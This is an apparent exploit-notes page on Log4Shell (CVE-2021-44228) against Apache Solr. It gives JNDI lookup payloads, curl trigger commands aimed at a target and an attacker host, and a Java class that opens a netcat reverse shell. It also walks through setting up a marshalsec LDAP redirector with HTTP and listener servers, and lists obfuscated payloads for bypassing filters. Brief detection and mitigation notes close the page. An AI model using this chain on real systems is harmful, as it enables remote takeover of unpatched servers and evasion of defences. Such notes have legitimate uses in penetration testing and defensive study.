killchain-compendium/exploit/java/log4shell.md

Log4Shell

• log4j < version 2.15.0rc2

• CVE-2021-44228

• log4j vulnerability tester

• List of exploitable services

• Code inside a param value is parsed and a ${payload} will be executed, for example

${sys:os.name}
${sys:user.name}
${log4j:configParentLocation}
${ENV:PATH}
${ENV:HOSTNAME}
${java:version}

Java Naming and Directory Interface JNDI

• Vulnerability can be exploited via ${jndi:ldap://<attacker-IP>/foo}

POC

curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}'

• Use HTTP header field as storage for payload or any other possible input field

X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}

Usage

• Fuzz endpoints to applicate the exploit on

• Clone and build marshallsec via mvn clean package -DskipTests

• Java version should be the same as the one on the target

• A Proxy LDAP server to an HTTP server is needed

• Compile following Java reverse shell via javac Exploit.java -source 8 -target 8 to Exploit.class

public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

• Run the LDAP, HTTP and reverse shell

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"

php -S 0.0.0.:8000

nc -lvnp 4449

• Trigger via curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'

Detection

• Log4Shell-Hashes

• Vulnerable Class + Jar hashes

• reddit mega thread

• Yara rules

• Parse logs for jndi

Obfuscation

• Possible bypasses are as follows

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${::-j}ndi:rmi://attackerendpoint.com/}

Mitgation

• Apache Solr security news
• Add the following line to solr.in.sh

SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"